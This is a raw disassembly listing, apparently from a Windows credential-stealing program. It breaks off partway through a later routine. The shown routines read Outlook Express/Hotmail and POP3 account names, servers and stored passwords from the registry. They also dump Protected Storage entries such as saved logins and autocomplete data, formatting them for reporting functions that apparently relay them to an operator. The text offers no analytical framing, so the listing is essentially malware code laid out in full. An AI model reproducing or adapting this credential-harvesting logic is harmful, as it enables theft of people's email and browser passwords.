sub esp, 2ECh
push ebx
push edi
xor ebx, ebx
push 3A98h
push ebx
push offset dword_66FBF0
call sub_429760
mov edi, dword_4370B4
add esp, 0Ch
lea eax, [ebp+var_224]
push offset aSoftwareMicr_1 ; "Software\\Microsoft\\Internet Account Man"...
push eax
call edi ; dword_4370B4
lea eax, [ebp+var_24]
push eax
push 0F003Fh
lea eax, [ebp+var_224]
push ebx
push eax
push 80000001h
call dword_456FC0 ; RegOpenKeyExA
test eax, eax
jnz loc_423C76
push esi
mov [ebp+var_18], ebx
mov [ebp+var_10], 3
mov esi, 96h
loc_423981: ; CODE XREF: sub_423919+356�j
lea eax, [ebp+var_2C]
mov [ebp+var_1C], 0C8h
push eax
push ebx
push ebx
lea eax, [ebp+var_1C]
push ebx
push eax
lea eax, [ebp+var_2EC]
push eax
push [ebp+var_18]
push [ebp+var_24]
call dword_456E68 ; RegEnumKeyExA
mov [ebp+var_20], eax
lea eax, [ebp+var_224]
push offset aSoftwareMicr_1 ; "Software\\Microsoft\\Internet Account Man"...
push eax
call edi ; dword_4370B4
lea eax, [ebp+var_224]
push offset asc_44DABC ; "\\"
push eax
call dword_437090 ; lstrcatA
lea eax, [ebp+var_2EC]
push eax
lea eax, [ebp+var_224]
push eax
call dword_437090 ; lstrcatA
lea eax, [ebp+var_14]
push eax
push 0F003Fh
lea eax, [ebp+var_224]
push ebx
push eax
push 80000001h
call dword_456FC0 ; RegOpenKeyExA
lea eax, [ebp+var_8]
mov [ebp+var_8], esi
push eax
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
push offset aHttpmailUserna ; "HTTPMail UserName"
push [ebp+var_14]
call dword_456DF0 ; RegQueryValueExA
test eax, eax
jnz loc_423B05
lea eax, [ebp+var_15C]
push eax
mov eax, dword_673688
imul eax, 12Ch
add eax, offset dword_66FBF0
push eax
call edi ; dword_4370B4
push esi
lea eax, [ebp+var_15C]
push ebx
push eax
call sub_429760
mov eax, dword_673688
add esp, 0Ch
imul eax, 12Ch
add eax, offset dword_66FCB8
push offset aHotmail ; "Hotmail"
push eax
call edi ; dword_4370B4
lea eax, [ebp+var_8]
mov [ebp+var_8], esi
push eax
lea eax, [ebp+var_C4]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
push offset aHttpmailPass2 ; "HTTPMail Pass2"
push [ebp+var_14]
call dword_456DF0 ; RegQueryValueExA
test eax, eax
jnz loc_423C4E
push 2
mov [ebp+var_C], ebx
pop eax
cmp [ebp+var_8], eax
mov [ebp+var_4], eax
jbe loc_423C39
loc_423AA0: ; CODE XREF: sub_423919+1E5�j
mov eax, [ebp+var_4]
mov al, [ebp+eax+var_C4]
push eax
call dword_437268 ; IsCharAlphaNumericA
test eax, eax
jnz short loc_423AD3
mov eax, [ebp+var_4]
mov al, [ebp+eax+var_C4]
cmp al, 28h
jz short loc_423AD3
cmp al, 29h
jz short loc_423AD3
cmp al, 2Eh
jz short loc_423AD3
cmp al, 20h
jz short loc_423AD3
cmp al, 2Dh
jnz short loc_423AF5
loc_423AD3: ; CODE XREF: sub_423919+19A�j
; sub_423919+1A8�j ...
mov eax, dword_673688
mov ecx, [ebp+var_4]
imul eax, 12Ch
mov edx, [ebp+var_C]
mov cl, [ebp+ecx+var_C4]
inc [ebp+var_C]
mov byte_66FC54[eax+edx], cl
loc_423AF5: ; CODE XREF: sub_423919+1B8�j
inc [ebp+var_4]
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jb short loc_423AA0
jmp loc_423C39
; ---------------------------------------------------------------------------
loc_423B05: ; CODE XREF: sub_423919+103�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
push offset aPop3UserName ; "POP3 User Name"
push [ebp+var_14]
call dword_456DF0 ; RegQueryValueExA
test eax, eax
jnz loc_423C65
lea eax, [ebp+var_15C]
push eax
mov eax, dword_673688
imul eax, 12Ch
add eax, offset dword_66FBF0
push eax
call edi ; dword_4370B4
push esi
lea eax, [ebp+var_15C]
push ebx
push eax
call sub_429760
add esp, 0Ch
lea eax, [ebp+var_8]
mov [ebp+var_8], esi
push eax
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
push offset aPop3Server ; "POP3 Server"
push [ebp+var_14]
call dword_456DF0 ; RegQueryValueExA
lea eax, [ebp+var_15C]
push eax
mov eax, dword_673688
imul eax, 12Ch
add eax, offset dword_66FCB8
push eax
call edi ; dword_4370B4
push esi
lea eax, [ebp+var_15C]
push ebx
push eax
call sub_429760
add esp, 0Ch
lea eax, [ebp+var_8]
mov [ebp+var_8], esi
push eax
lea eax, [ebp+var_C4]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
push offset aPop3Pass2 ; "POP3 Pass2"
push [ebp+var_14]
call dword_456DF0 ; RegQueryValueExA
test eax, eax
jnz loc_423C4E
push 2
mov [ebp+var_C], ebx
pop eax
cmp [ebp+var_8], eax
mov [ebp+var_4], eax
jbe short loc_423C39
loc_423BD9: ; CODE XREF: sub_423919+31E�j
mov eax, [ebp+var_4]
mov al, [ebp+eax+var_C4]
push eax
call dword_437268 ; IsCharAlphaNumericA
test eax, eax
jnz short loc_423C0C
mov eax, [ebp+var_4]
mov al, [ebp+eax+var_C4]
cmp al, 28h
jz short loc_423C0C
cmp al, 29h
jz short loc_423C0C
cmp al, 2Eh
jz short loc_423C0C
cmp al, 20h
jz short loc_423C0C
cmp al, 2Dh
jnz short loc_423C2E
loc_423C0C: ; CODE XREF: sub_423919+2D3�j
; sub_423919+2E1�j ...
mov eax, dword_673688
mov ecx, [ebp+var_4]
imul eax, 12Ch
mov edx, [ebp+var_C]
mov cl, [ebp+ecx+var_C4]
inc [ebp+var_C]
mov byte_66FC54[eax+edx], cl
loc_423C2E: ; CODE XREF: sub_423919+2F1�j
inc [ebp+var_4]
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jb short loc_423BD9
loc_423C39: ; CODE XREF: sub_423919+181�j
; sub_423919+1E7�j ...
mov eax, dword_673688
mov ecx, [ebp+var_C]
imul eax, 12Ch
mov byte_66FC54[eax+ecx], bl
loc_423C4E: ; CODE XREF: sub_423919+16F�j
; sub_423919+2AC�j
push esi
lea eax, [ebp+var_C4]
push ebx
push eax
call sub_429760
add esp, 0Ch
inc dword_673688
loc_423C65: ; CODE XREF: sub_423919+20C�j
inc [ebp+var_18]
cmp [ebp+var_20], 103h
jnz loc_423981
pop esi
loc_423C76: ; CODE XREF: sub_423919+52�j
pop edi
pop ebx
leave
retn
sub_423919 endp
; =============== S U B R O U T I N E =======================================
sub_423C7A proc near ; CODE XREF: sub_423846+9D�p
mov eax, offset loc_436680
call sub_42B7CC
sub esp, 0DF0h
push ebx
push esi
push edi
push offset aProtectedstora ; "ProtectedStorage"
call sub_42806A
test eax, eax
pop ecx
jnz short loc_423CEF
cmp [ebp+14h], eax
mov edi, offset aIhfnL6b5x ; "/iHFN/l6B5X/"
mov ebx, offset a6atss0dycwf_6n ; "6atSs0dyCWF.6N5aw.affEY1"
mov esi, offset dword_45026C
jnz short loc_423CCF
cmp [ebp+18h], eax
jnz short loc_423CD9
cmp [ebp+1Ch], eax
jz loc_423E25
push edi
push ebx
push esi
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_41CE4A
add esp, 14h
loc_423CCF: ; CODE XREF: sub_423C7A+34�j
cmp dword ptr [ebp+18h], 0
jz loc_423E25
loc_423CD9: ; CODE XREF: sub_423C7A+39�j
push edi
push ebx
push esi
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_41CDD4
add esp, 14h
jmp loc_423E25
; ---------------------------------------------------------------------------
loc_423CEF: ; CODE XREF: sub_423C7A+20�j
call sub_428017
xor esi, esi
mov [ebp-14h], esi
push esi
push esi
lea eax, [ebp-10h]
push esi
push eax
mov [ebp-4], esi
mov [ebp-10h], esi
call dword_456F0C
cmp eax, esi
jge short loc_423D73
xor eax, eax
mov ebx, offset a6atss0dycwf_6n ; "6atSs0dyCWF.6N5aw.affEY1"
cmp [ebp+14h], eax
mov edi, offset aYdidb16dnmq_ ; "YdidB16dnMQ."
mov esi, offset aSSD_0 ; "%s %s: <%d>"
jnz short loc_423D4C
cmp [ebp+18h], eax
jnz short loc_423D56
cmp [ebp+1Ch], eax
jz loc_423E14
call dword_437170 ; RtlGetLastWin32Error
push eax
push edi
push ebx
push esi
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_41CE4A
add esp, 18h
loc_423D4C: ; CODE XREF: sub_423C7A+AA�j
cmp dword ptr [ebp+18h], 0
jz loc_423E14
loc_423D56: ; CODE XREF: sub_423C7A+AF�j
call dword_437170 ; RtlGetLastWin32Error
push eax
push edi
push ebx
push esi
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_41CDD4
add esp, 18h
jmp loc_423E14
; ---------------------------------------------------------------------------
loc_423D73: ; CODE XREF: sub_423C7A+94�j
cmp [ebp-10h], esi
mov byte ptr [ebp-4], 1
mov [ebp-20h], esi
jnz short loc_423D89
push 80004003h
call sub_429260
loc_423D89: ; CODE XREF: sub_423C7A+103�j
mov edi, [ebp-10h]
lea ecx, [ebp-20h]
push ecx
push esi
mov eax, [edi]
push esi
push edi
call dword ptr [eax+38h]
cmp eax, esi
jge loc_423E2C
push offset dword_45025C
push edi
push eax
call sub_42926E
cmp dword ptr [ebp+14h], 0
mov ebx, offset a6atss0dycwf_6n ; "6atSs0dyCWF.6N5aw.affEY1"
mov edi, offset aYdidb16dnmq_ ; "YdidB16dnMQ."
mov esi, offset aSSD_0 ; "%s %s: <%d>"
jnz short loc_423DE5
cmp dword ptr [ebp+18h], 0
jnz short loc_423DEB
cmp dword ptr [ebp+1Ch], 0
jz short loc_423E03
call dword_437170 ; RtlGetLastWin32Error
push eax
push edi
push ebx
push esi
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_41CE4A
add esp, 18h
loc_423DE5: ; CODE XREF: sub_423C7A+145�j
cmp dword ptr [ebp+18h], 0
jz short loc_423E03
loc_423DEB: ; CODE XREF: sub_423C7A+14B�j
call dword_437170 ; RtlGetLastWin32Error
push eax
push edi
push ebx
push esi
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_41CDD4
add esp, 18h
loc_423E03: ; CODE XREF: sub_423C7A+151�j
; sub_423C7A+16F�j
mov eax, [ebp-20h]
and byte ptr [ebp-4], 0
test eax, eax
jz short loc_423E14
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_423E14: ; CODE XREF: sub_423C7A+B4�j
; sub_423C7A+D6�j ...
mov eax, [ebp-10h]
or dword ptr [ebp-4], 0FFFFFFFFh
test eax, eax
jz short loc_423E25
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_423E25: ; CODE XREF: sub_423C7A+3E�j
; sub_423C7A+59�j ...
xor eax, eax
jmp loc_4245DE
; ---------------------------------------------------------------------------
loc_423E2C: ; CODE XREF: sub_423C7A+120�j
mov ebx, offset a6atss0dycwf_6n ; "6atSs0dyCWF.6N5aw.affEY1"
loc_423E31: ; CODE XREF: sub_423C7A+8F0�j
; sub_423C7A+8FC�j
xor edi, edi
cmp [ebp-20h], edi
jnz short loc_423E42
push 80004003h
call sub_429260
loc_423E42: ; CODE XREF: sub_423C7A+1BC�j
mov eax, [ebp-20h]
lea edx, [ebp-40h]
push edi
push edx
mov ecx, [eax]
push 1
push eax
call dword ptr [ecx+0Ch]
test eax, eax
jnz loc_42457B
sub esp, 10h
lea esi, [ebp-40h]
mov edi, esp
lea eax, [ebp-84h]
movsd
movsd
movsd
push offset asc_450258 ; "%x"
push eax
movsd
call dword_437278 ; wsprintfA
add esp, 18h
and dword ptr [ebp-2Ch], 0
cmp dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 2
jnz short loc_423E93
push 80004003h
call sub_429260
loc_423E93: ; CODE XREF: sub_423C7A+20D�j
mov esi, [ebp-10h]
lea ecx, [ebp-2Ch]
push ecx
lea ecx, [ebp-40h]
mov eax, [esi]
push 0
push ecx
push 0
push esi
call dword ptr [eax+3Ch]
test eax, eax
jge short loc_423EB8
push offset dword_45025C
push esi
push eax
call sub_42926E
loc_423EB8: ; CODE XREF: sub_423C7A+230�j
mov edi, offset byte_454A54
loc_423EBD: ; CODE XREF: sub_423C7A+8D6�j
; sub_423C7A+8E2�j
xor esi, esi
cmp [ebp-2Ch], esi
jnz short loc_423ECE
push 80004003h
call sub_429260
loc_423ECE: ; CODE XREF: sub_423C7A+248�j
mov eax, [ebp-2Ch]
lea edx, [ebp-50h]
push esi
push edx
mov ecx, [eax]
push 1
push eax
call dword ptr [ecx+0Ch]
test eax, eax
jnz loc_424561
cmp [ebp-10h], esi
mov byte ptr [ebp-4], 3
mov [ebp-28h], esi
jnz short loc_423EFC
push 80004003h
call sub_429260
loc_423EFC: ; CODE XREF: sub_423C7A+276�j
mov esi, [ebp-10h]
lea ecx, [ebp-28h]
push ecx
lea ecx, [ebp-50h]
mov eax, [esi]
push 0
push ecx
lea ecx, [ebp-40h]
push ecx
push 0
push esi
call dword ptr [eax+54h]
test eax, eax
jge short loc_423F25
push offset dword_45025C
push esi
push eax
call sub_42926E
loc_423F25: ; CODE XREF: sub_423C7A+29D�j
; sub_423C7A+8C8�j
xor esi, esi
cmp [ebp-28h], esi
jnz short loc_423F36
push 80004003h
call sub_429260
loc_423F36: ; CODE XREF: sub_423C7A+2B0�j
mov eax, [ebp-28h]
lea edx, [ebp-30h]
push esi
push edx
mov ecx, [eax]
push 1
push eax
call dword ptr [ecx+0Ch]
test eax, eax
jnz loc_424547
push dword ptr [ebp-30h]
lea eax, [ebp-614h]
push offset aWs ; "%ws"
push eax
call dword_437278 ; wsprintfA
add esp, 0Ch
cmp [ebp-10h], esi
mov [ebp-24h], esi
mov [ebp-18h], esi
jnz short loc_423F7B
push 80004003h
call sub_429260
loc_423F7B: ; CODE XREF: sub_423C7A+2F5�j
xor eax, eax
lea edx, [ebp-18h]
push eax
push eax
push edx
mov esi, [ebp-10h]
lea edx, [ebp-24h]
push edx
mov ecx, [esi]
push dword ptr [ebp-30h]
lea edx, [ebp-50h]
push edx
lea edx, [ebp-40h]
push edx
push eax
push esi
call dword ptr [ecx+44h]
test eax, eax
jge short loc_423FAC
push offset dword_45025C
push esi
push eax
call sub_42926E
loc_423FAC: ; CODE XREF: sub_423C7A+324�j
push dword ptr [ebp-18h]
call dword_437088 ; lstrlenA
mov esi, [ebp-24h]
lea ecx, [esi-1]
cmp eax, ecx
jnb short loc_423FF3
xor ecx, ecx
xor edx, edx
test esi, esi
jbe short loc_423FE9
loc_423FC7: ; CODE XREF: sub_423C7A+36D�j
mov eax, [ebp-18h]
mov al, [edx+eax]
test al, al
jnz short loc_423FDB
mov byte ptr [ebp+ecx-414h], 2Ch
jmp short loc_423FE2
; ---------------------------------------------------------------------------
loc_423FDB: ; CODE XREF: sub_423C7A+355�j
mov [ebp+ecx-414h], al
loc_423FE2: ; CODE XREF: sub_423C7A+35F�j
inc ecx
inc edx
inc edx
cmp edx, esi
jb short loc_423FC7
loc_423FE9: ; CODE XREF: sub_423C7A+34B�j
and byte ptr [ebp+ecx-415h], 0
jmp short loc_42400B
; ---------------------------------------------------------------------------
loc_423FF3: ; CODE XREF: sub_423C7A+343�j
push dword ptr [ebp-18h]
lea eax, [ebp-414h]
push offset aS_5 ; "%s"
push eax
call dword_437278 ; wsprintfA
add esp, 0Ch
loc_42400B: ; CODE XREF: sub_423C7A+377�j
mov esi, dword_4370B4
lea eax, [ebp-0DFCh]
push edi
push eax
call esi ; dword_4370B4
lea eax, [ebp-814h]
push edi
push eax
call esi ; dword_4370B4
lea eax, [ebp-84h]
push offset a5e7e8100 ; "5e7e8100"
push eax
call dword_4370FC ; lstrcmpA
test eax, eax
jnz loc_4240FA
lea eax, [ebp-1B0h]
push edi
push eax
call esi ; dword_4370B4
lea eax, [ebp-414h]
push offset asc_446E08 ; ":"
push eax
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jz short loc_424094
lea eax, [ebp-414h]
push offset asc_446E08 ; ":"
push eax
call sub_42AEA0
pop ecx
inc eax
pop ecx
push eax
lea eax, [ebp-1B0h]
push eax
call esi ; dword_4370B4
lea eax, [ebp-414h]
push offset asc_446E08 ; ":"
push eax
call sub_42AEA0
and byte ptr [eax], 0
pop ecx
pop ecx
loc_424094: ; CODE XREF: sub_423C7A+3E4�j
inc dword ptr [ebp-14h]
lea eax, [ebp-414h]
push edi
push eax
call dword_437178 ; lstrcmpiA
test eax, eax
jz short loc_4240BB
lea eax, [ebp-1B0h]
push edi
push eax
call dword_437178 ; lstrcmpiA
test eax, eax
jnz short loc_4240C1
loc_4240BB: ; CODE XREF: sub_423C7A+42D�j
cmp dword ptr [ebp+1Ch], 0
jz short loc_4240FA
loc_4240C1: ; CODE XREF: sub_423C7A+43F�j
lea eax, [ebp-1B0h]
cmp dword ptr [ebp+18h], 0
push eax
lea eax, [ebp-414h]
push eax
lea eax, [ebp-614h]
push eax
push ebx
push offset dword_45021C
push dword ptr [ebp+10h]
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
jnz short loc_4240F2
call sub_41CF4C
jmp short loc_4240F7
; ---------------------------------------------------------------------------
loc_4240F2: ; CODE XREF: sub_423C7A+46F�j
call sub_41CFE0
loc_4240F7: ; CODE XREF: sub_423C7A+476�j
add esp, 20h
loc_4240FA: ; CODE XREF: sub_423C7A+3BF�j
; sub_423C7A+445�j
lea eax, [ebp-84h]
push offset aE161255a ; "e161255a"
push eax
call dword_4370FC ; lstrcmpA
test eax, eax
jnz loc_42425D
lea eax, [ebp-614h]
push offset aStringindex ; "StringIndex"
push eax
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz loc_42425D
lea eax, [ebp-614h]
push offset dword_4501FC
push eax
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jz short loc_42415C
lea eax, [ebp-614h]
push offset dword_4501FC
push eax
call sub_42AEA0
and byte ptr [eax], 0
pop ecx
pop ecx
loc_42415C: ; CODE XREF: sub_423C7A+4CA�j
lea eax, [ebp-614h]
push 8
push eax
lea eax, [ebp-1B0h]
push eax
call dword_43712C ; lstrcpynA
lea eax, [ebp-1B0h]
push offset dword_4501F4
push eax
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_4241A4
lea eax, [ebp-1B0h]
push offset dword_4501EC
push eax
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jz loc_42425D
loc_4241A4: ; CODE XREF: sub_423C7A+50D�j
lea eax, [ebp-1B0h]
push edi
push eax
call esi ; dword_4370B4
lea eax, [ebp-414h]
push offset dword_44F120
push eax
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jz short loc_4241F9
lea eax, [ebp-414h]
push offset dword_44F120
push eax
call sub_42AEA0
pop ecx
inc eax
pop ecx
push eax
lea eax, [ebp-1B0h]
push eax
call esi ; dword_4370B4
lea eax, [ebp-414h]
push offset dword_44F120
push eax
call sub_42AEA0
and byte ptr [eax], 0
pop ecx
pop ecx
loc_4241F9: ; CODE XREF: sub_423C7A+549�j
mov esi, dword_437178
inc dword ptr [ebp-14h]
lea eax, [ebp-414h]
push edi
push eax
call esi ; dword_437178
test eax, eax
jz short loc_42421E
lea eax, [ebp-1B0h]
push edi
push eax
call esi ; dword_437178
test eax, eax
jnz short loc_424224
loc_42421E: ; CODE XREF: sub_423C7A+594�j
cmp dword ptr [ebp+1Ch], 0
jz short loc_42425D
loc_424224: ; CODE XREF: sub_423C7A+5A2�j
lea eax, [ebp-1B0h]
cmp dword ptr [ebp+18h], 0
push eax
lea eax, [ebp-414h]
push eax
lea eax, [ebp-614h]
push eax
push ebx
push offset dword_4501C8
push dword ptr [ebp+10h]
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
jnz short loc_424255
call sub_41CF4C
jmp short loc_42425A
; ---------------------------------------------------------------------------
loc_424255: ; CODE XREF: sub_423C7A+5D2�j
call sub_41CFE0
loc_42425A: ; CODE XREF: sub_423C7A+5D9�j
add esp, 20h
loc_42425D: ; CODE XREF: sub_423C7A+494�j
; sub_423C7A+4AF�j ...
lea eax, [ebp-84h]
push offset aB9819c52 ; "b9819c52"
push eax
call dword_4370FC ; lstrcmpA
test eax, eax
jnz loc_4243FC
mov eax, [ebp-18h]
xor esi, esi
xor edi, edi
cmp [ebp-24h], esi
jbe short loc_4242C6
loc_424283: ; CODE XREF: sub_423C7A+64A�j
mov cl, [esi+eax]
test cl, cl
jnz short loc_424294
mov byte ptr [ebp+edi-414h], 2Ch
jmp short loc_4242BE
; ---------------------------------------------------------------------------
loc_424294: ; CODE XREF: sub_423C7A+60E�j
push ecx
call dword_437268 ; IsCharAlphaNumericA
test eax, eax
mov eax, [ebp-18h]
jnz short loc_4242B4
mov cl, [esi+eax]
cmp cl, 40h
jz short loc_4242B4
cmp cl, 2Eh
jz short loc_4242B4
cmp cl, 5Fh
jnz short loc_4242BF
loc_4242B4: ; CODE XREF: sub_423C7A+626�j
; sub_423C7A+62E�j ...
mov cl, [esi+eax]
mov [ebp+edi-414h], cl
loc_4242BE: ; CODE XREF: sub_423C7A+618�j
inc edi
loc_4242BF: ; CODE XREF: sub_423C7A+638�j
inc esi
inc esi
cmp esi, [ebp-24h]
jb short loc_424283
loc_4242C6: ; CODE XREF: sub_423C7A+607�j
and byte ptr [ebp+edi-415h], 0
and dword ptr [ebp-1Ch], 0
cmp byte ptr [eax+4], 0
lea esi, [ebp-412h]
jbe loc_4243FC
mov edi, offset dword_44F120
loc_4242E7: ; CODE XREF: sub_423C7A+77C�j
inc esi
lea eax, [ebp-214h]
push esi
push eax
call dword_4370B4 ; lstrcpyA
lea eax, [ebp-214h]
push edi
push eax
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jz short loc_42431B
lea eax, [ebp-214h]
push edi
push eax
call sub_42AEA0
and byte ptr [eax], 0
pop ecx
pop ecx
loc_42431B: ; CODE XREF: sub_423C7A+68D�j
push edi
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jz short loc_424341
push edi
push esi
call sub_42AEA0
pop ecx
inc eax
pop ecx
inc eax
push eax
lea eax, [ebp-0E8h]
push eax
call dword_4370B4 ; lstrcpyA
loc_424341: ; CODE XREF: sub_423C7A+6AC�j
lea eax, [ebp-0E8h]
push edi
push eax
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jz short loc_424366
lea eax, [ebp-0E8h]
push edi
push eax
call sub_42AEA0
and byte ptr [eax], 0
pop ecx
pop ecx
loc_424366: ; CODE XREF: sub_423C7A+6D8�j
push edi
push esi
call sub_42AEA0
pop ecx
mov esi, eax
pop ecx
lea eax, [ebp-0E8h]
push eax
call dword_437088 ; lstrlenA
lea esi, [esi+eax+9]
lea eax, [ebp-0E8h]
push offset byte_454A54
push eax
call dword_437178 ; lstrcmpiA
test eax, eax
jz short loc_4243AE
lea eax, [ebp-214h]
push offset byte_454A54
push eax
call dword_437178 ; lstrcmpiA
test eax, eax
jnz short loc_4243B4
loc_4243AE: ; CODE XREF: sub_423C7A+71C�j
cmp dword ptr [ebp+1Ch], 0
jz short loc_4243E9
loc_4243B4: ; CODE XREF: sub_423C7A+732�j
lea eax, [ebp-0E8h]
inc dword ptr [ebp-14h]
push eax
lea eax, [ebp-214h]
push eax
push ebx
cmp dword ptr [ebp+18h], 0
push offset dword_450194
push dword ptr [ebp+10h]
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
jnz short loc_4243E1
call sub_41CF4C
jmp short loc_4243E6
; ---------------------------------------------------------------------------
loc_4243E1: ; CODE XREF: sub_423C7A+75E�j
call sub_41CFE0
loc_4243E6: ; CODE XREF: sub_423C7A+765�j
add esp, 1Ch
loc_4243E9: ; CODE XREF: sub_423C7A+738�j
mov eax, [ebp-18h]
inc dword ptr [ebp-1Ch]
movzx eax, byte ptr [eax+4]
cmp [ebp-1Ch], eax
jl loc_4242E7
loc_4243FC: ; CODE XREF: sub_423C7A+5F7�j
; sub_423C7A+662�j
lea eax, [ebp-84h]
push offset a220d5cc1 ; "220d5cc1"
push eax
call dword_4370FC ; lstrcmpA
test eax, eax
jnz loc_424517
xor esi, esi
mov edi, offset byte_454A54
cmp dword_673688, esi
jle short loc_424462
mov dword ptr [ebp-1Ch], offset byte_66FC54
loc_42442C: ; CODE XREF: sub_423C7A+7E6�j
lea eax, [ebp-614h]
push eax
push dword ptr [ebp-1Ch]
call dword_4370FC ; lstrcmpA
test eax, eax
jnz short loc_424452
lea eax, [ebp-414h]
push edi
push eax
call dword_437178 ; lstrcmpiA
test eax, eax
jnz short loc_424491
loc_424452: ; CODE XREF: sub_423C7A+7C4�j
add dword ptr [ebp-1Ch], 12Ch
inc esi
cmp esi, dword_673688
jl short loc_42442C
loc_424462: ; CODE XREF: sub_423C7A+7A9�j
lea eax, [ebp-414h]
push edi
push eax
call dword_437178 ; lstrcmpiA
test eax, eax
jz short loc_4244D5
mov eax, esi
push edi
imul eax, 12Ch
mov edi, offset dword_66FBF0
add eax, edi
push eax
call dword_437178 ; lstrcmpiA
test eax, eax
jnz short loc_4244E0
jmp short loc_4244DA
; ---------------------------------------------------------------------------
loc_424491: ; CODE XREF: sub_423C7A+7D6�j
imul esi, 12Ch
lea eax, [ebp-414h]
inc dword ptr [ebp-14h]
push eax
lea eax, dword_66FBF0[esi]
push eax
lea eax, dword_66FCB8[esi]
push eax
push ebx
cmp dword ptr [ebp+18h], 0
push offset dword_45015C
push dword ptr [ebp+10h]
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
jnz short loc_4244CE
call sub_41CF4C
loc_4244C9: ; CODE XREF: sub_423C7A+859�j
add esp, 20h
jmp short loc_424517
; ---------------------------------------------------------------------------
loc_4244CE: ; CODE XREF: sub_423C7A+848�j
call sub_41CFE0
jmp short loc_4244C9
; ---------------------------------------------------------------------------
loc_4244D5: ; CODE XREF: sub_423C7A+7F8�j
mov edi, offset dword_66FBF0
loc_4244DA: ; CODE XREF: sub_423C7A+815�j
cmp dword ptr [ebp+1Ch], 0
jz short loc_424517
loc_4244E0: ; CODE XREF: sub_423C7A+813�j
imul esi, 12Ch
lea eax, [ebp-414h]
add esi, edi
push eax
inc dword ptr [ebp-14h]
push esi
push ebx
cmp dword ptr [ebp+18h], 0
push offset dword_45012C
push dword ptr [ebp+10h]
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
jnz short loc_42450F
call sub_41CF4C
jmp short loc_424514
; ---------------------------------------------------------------------------
loc_42450F: ; CODE XREF: sub_423C7A+88C�j
call sub_41CFE0
loc_424514: ; CODE XREF: sub_423C7A+893�j
add esp, 1Ch
loc_424517: ; CODE XREF: sub_423C7A+796�j
; sub_423C7A+852�j ...
mov esi, 200h
lea eax, [ebp-614h]
push esi
push 0
push eax
call sub_429760
push esi
lea eax, [ebp-414h]
push 0
push eax
call sub_429760
add esp, 18h
mov edi, offset byte_454A54
jmp loc_423F25
; ---------------------------------------------------------------------------
loc_424547: ; CODE XREF: sub_423C7A+2CE�j
mov eax, [ebp-28h]
mov byte ptr [ebp-4], 2
cmp eax, esi
jz loc_423EBD
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
jmp loc_423EBD
; ---------------------------------------------------------------------------
loc_424561: ; CODE XREF: sub_423C7A+266�j
mov eax, [ebp-2Ch]
mov byte ptr [ebp-4], 1
cmp eax, esi
jz loc_423E31
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
jmp loc_423E31
; ---------------------------------------------------------------------------
loc_42457B: ; CODE XREF: sub_423C7A+1DA�j
cmp [ebp-14h], edi
jnz short loc_4245B9
cmp [ebp+14h], edi
mov esi, offset aSNoPstoreEntri ; "%s No PStore entries found."
jnz short loc_4245A4
cmp [ebp+18h], edi
jnz short loc_4245A9
cmp [ebp+1Ch], edi
jz short loc_4245B9
push ebx
push esi
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_41CE4A
add esp, 10h
loc_4245A4: ; CODE XREF: sub_423C7A+90E�j
cmp [ebp+18h], edi
jz short loc_4245B9
loc_4245A9: ; CODE XREF: sub_423C7A+913�j
push ebx
push esi
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_41CDD4
add esp, 10h
loc_4245B9: ; CODE XREF: sub_423C7A+904�j
; sub_423C7A+918�j ...
mov eax, [ebp-20h]
and byte ptr [ebp-4], 0
cmp eax, edi
jz short loc_4245CA
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_4245CA: ; CODE XREF: sub_423C7A+948�j
mov eax, [ebp-10h]
or dword ptr [ebp-4], 0FFFFFFFFh
cmp eax, edi
jz short loc_4245DB
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_4245DB: ; CODE XREF: sub_423C7A+959�j
xor eax, eax
inc eax
loc_4245DE: ; CODE XREF: sub_423C7A+1AD�j
mov ecx, [ebp-0Ch]
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn
sub_423C7A endp
; =============== S U B R O U T I N E =======================================
sub_4245ED proc near ; CODE XREF: sub_424B0B+8D�p
arg_0 = dword ptr 4
and dword_673690, 0
and dword_67368C, 0
push offset word_43EF70
push [esp+4+arg_0]
call sub_42A50C
pop ecx
mov dword_6737CC, eax
pop ecx
xor ecx, ecx
test eax, eax
setnz cl
mov eax, ecx
retn
sub_4245ED endp
; =============== S U B R O U T I N E =======================================
sub_42461A proc near ; CODE XREF: sub_424666:loc_424671�p
mov eax, dword_673690
cmp eax, dword_67368C
jl short loc_424654
push dword_6737CC
and dword_673690, 0
push 2800h
push 1
push offset byte_66D3E8
call sub_42A188
add esp, 10h
